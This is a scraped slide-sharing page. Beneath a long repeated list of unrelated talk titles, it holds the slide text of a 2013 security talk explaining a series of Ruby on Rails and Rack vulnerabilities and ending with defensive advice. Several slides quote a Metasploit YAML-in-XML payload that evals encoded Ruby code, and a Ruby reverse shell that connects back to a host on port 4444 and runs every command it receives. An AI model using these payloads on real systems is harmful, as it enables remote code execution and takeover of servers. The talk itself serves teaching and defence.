Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMESafe Software
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024The Digital Insurer
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Scriptwesley chun
 
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)wesley chun
 
GenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdfGenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdflior mazor
 
AWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAndrey Devyatkin
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024The Digital Insurer
 
Polkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin WoodPolkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin WoodJuan lago vázquez
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityPrincipled Technologies
 
MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024MIND CTI
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024Rafal Los
 
Artificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : UncertaintyArtificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : UncertaintyKhushali Kathiriya
 
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost SavingRepurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost SavingEdi Saputra
 
Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...apidays
 

Último (20)

2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...
 
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
 
Manulife - Insurer Innovation Award 2024
Manulife - Insurer Innovation Award 2024Manulife - Insurer Innovation Award 2024
Manulife - Insurer Innovation Award 2024
 
Real Time Object Detection Using Open CV
Real Time Object Detection Using Open CVReal Time Object Detection Using Open CV
Real Time Object Detection Using Open CV
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
 
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a Fresher
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Script
 
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)
 
GenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdfGenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdf
 
AWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of Terraform
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
 
Polkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin WoodPolkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin Wood
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
 
MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024
 
Artificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : UncertaintyArtificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : Uncertainty
 
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost SavingRepurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
 
Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...
 

Ruxmon feb 2013 what happened to rails

  • 1. What happened to Ruby- on-Rails? Louis Nyffenegger louis@pentesterlab.com @snyff
  • 2. About me... ● Independent security consultant: ○ Code review ○ Training ○ Penetration testing ● Work on really cool stuff in my free time: ○ https://pentesterlab.com/exercises ○ https://pentesterlab.com/bootcamp/
  • 3. Ruby-On-Rails ● Ruby framework to develop web applications ● Protect from most web security issues: ○ SQL injections ○ Cross-Site Scripting ○ Cross-Site Request Forgery ● Good reputation... including security wise
  • 4. What happened to Rails? ● Recently a lot of vulnerabilities have been published in Ruby-On-Rails ● In the past, most vulnerabilities were low-risk issues but nothing really bad ● This time we're talking remote code execution
  • 5. Rails Security: The usual suspects... @benmmurphy @joernchen @tenderlove @homakov @charliesome @postmodern_mod3
  • 6. Non technical reasons ● People assumed it was secure ● More and more used: ○ more users -> more targeted ○ if an application didn't get any bug published it's probably because no one cares ● A lot of Ruby hackers: ○ Ruby-on-Rails devs ○ People looking for bugs in Ruby-on-Rails and Ruby-on- Rails applications
  • 7. It all started... CVE-2012-5664 ● Talk from Joernchen (Phenoelit) at ZeroNights: "Let me github that for you" (21/12/2012) ● Rack Session (used by Rails): ○ base64(Marshal(data))--HMAC(SHA1(base64(Marshal (data)), secret) ● PentesterLab's exercise on this: https://pentesterlab. com/rack_cookies_and_commands_injection. html
  • 8. It all started... CVE-2012-5664 ● Session's secret exposed on Github: ○ Arbitrary session modifications ○ SQL injection if you know the secret and the application uses authlogic ● Limited risk based on this... in theory
  • 9. It all started... CVE-2012-5664 ● As always... Twitter started screaming and loling on this bug... ○ signal vs noise :/ ● A lot of people (including me) thought it was only exploitable in this condition: http://blog.pentesterlab.com/2013/01/on-exploiting-cve- 2012-5664.html http://blog.phusion.nl/2013/01/03/rails-sql-injection- vulnerability-hold-your-horses-here-are-the-facts/
  • 10. It all started... CVE-2012-5664 ● If you want to do something like: http://vulnerable/id[:select]=password from users ● Rails prevents this ○ if you submit a hash, all keys get converted to Strings. ○ then, Rails check that the keys submitted are valid symbols: def assert_valid_keys(*valid_keys) unknown_keys = keys - [valid_keys].flatten raise(ArgumentError, "Unknown key(s): #{unknown_keys.join(", ")}") unless unknown_keys.empty?
  • 11. All could have happily stop here... but people started digging to find a way around this...
  • 12. And turned out... ● Rails can do a LOT of stuff... ○ parse traditional requests ○ parse XML request ○ parse JSON request ● And you can send YAML inside JSON and XML requests...
  • 13. YAML ● "YAML is a human-readable data serialization format "(Wikipedia). --- receipt: Oz-Ware Purchase Invoice date: 2007-08-06 customer: given: Dorothy family: Gale
  • 14. YAML inside XML... <?xml version="1.0" encoding="UTF-8"?> <blah type="yaml">--- !ruby/hash:... </blah>
  • 15. From YAML to code execution ● To translate that in the OS world: "you have FTP access to a system and want to get commands execution from it" ● Need to find a way to inject code and get it executed... ● Many methods more or less reliable depending on the version of Ruby and Ruby- On-Rails
  • 16. From YAML to code execution: msf way <SWfzexMD type='yaml'>--- !ruby/hash: ActionController::Routing::RouteSet:: NamedRouteCollection 'XIH; eval(%[Y29k... KZW5k].unpack(%[m0])[0]);' : !ruby/object: ActionController::Routing::Route segments: [] requirements: :tFuEk: :jyWUTgfc: :CAxk </SWfzexMD>  
  • 17. From YAML to code execution: msf way ● You basically inject code that will get evaluated by Ruby-On-Rails automatically ● The same vulnerability can also be used to get SQL injection using Arel ● From the code evaluated, msf does its usual stuff: ○ fork ○ connect back
  • 18. From YAML to code execution: msf way code = %(cmVxdW...ml9).unpack(%(m0)).first if RUBY_PLATFORM =~ /mswin|mingw|win32/ [...] else if ! Process.fork() eval(code) rescue nil end end
  • 19. From YAML to code execution: msf way require 'socket'; c=TCPSocket.new("[::1]","4444"); $stdin.reopen(c); $stdout.reopen(c); $stderr.reopen(c); $stdin.each_line {|l| l=l.strip next if l.length==0 system(l) }
  • 20. CVE-2013-0156... only POST? ● Only POST? ○ you need to send the XML in the body of the request... ● You can do a POST request and use the HTTP header: "X-HTTP-Method- Override: get" to get Rails to use your payload as if it was in a GET request
  • 21. CVE-2013-0155 ● "Unsafe Query Generation Risk in Ruby on Rails" (not SQL injection) using JSON ● Depends on the code used user = User.find_by_token(params[:token]) -> SELECT * FROM users where token=... ● You can manipulate the query using JSON to remove the WHERE statement: -> SELECT * FROM users
  • 22. Rack ● "Rack provides a minimal interface between web servers supporting Ruby and Ruby frameworks." ● Used by Rails and other frameworks ● Two vulnerabilities published in the same period: ○ CVE-2013-0262 ○ CVE-2013-0263 (already reported in 2009)
  • 23. Rack... CVE-2013-0263 def digest_match?(data, digest) return unless data && digest @secrets.any? do |secret| digest == generate_hmac(data, secret) end end
  • 24. Rack... CVE-2013-0263 ● Timing attack... ○ Create a malicious value ○ Bruteforce a valid HMAC ■ send HMAC "aaaaaaaaaaa..." ■ send HMAC "baaaaaaaaaa..." ■ send HMAC "caaaaaaaaaa..." ■ ... ■ compare responses' time ● Unlikely from Internet ○ "intercloud" attacks...
  • 25. CVE-2013-0277 ● Rails allows developers to store serialized data easily: class Post < ActiveRecord::Base serialize :tags end ● Turns out the serialisation is done using YAML... If a user can manipulate this parameter... game over :/
  • 26. Rack... CVE-2013-0262 ● Directory traversal in Rack::File ● When I looked at the bug I found a XSS in the same code ○ and another one in similar code in another file fail(404, "File not found: #{path_info}" ○ and the fact that rack follows symlinks ● Turns out this is used by BEEF... Content- Type: text/plain limits impact tho
  • 27. Rubygems.org compromised ● Gem == ruby library ● Rubygems is like a Debian mirror for Ruby ● Information about a package are stored inside a metadata.gz which is a compressed YAML file... and this information get displayed on the website: ○ Someone uploaded an "exploit.gem"...
  • 28. So what to do from now? ● ".to_s all the things" ○ most of the issues come from the mapping performed by Ruby-On-Rails ● Upgrade... (bundler-audit) ● Remove parsers you don't need: ActionDispatch::ParamsParser::DEFAULT_PARSERS.delete(Mime::XML) ActionDispatch::ParamsParser::DEFAULT_PARSERS.delete(Mime::JSON)
  • 29. And since we are talking about Rails Someone recently put together all the way to have vulnerable code in Ruby-on-Rails: http://rails-sqli.org/ You should also check Meder's Ruby Security Reviewer's Guide: http://code.google.com/p/ruby- security/wiki/Guide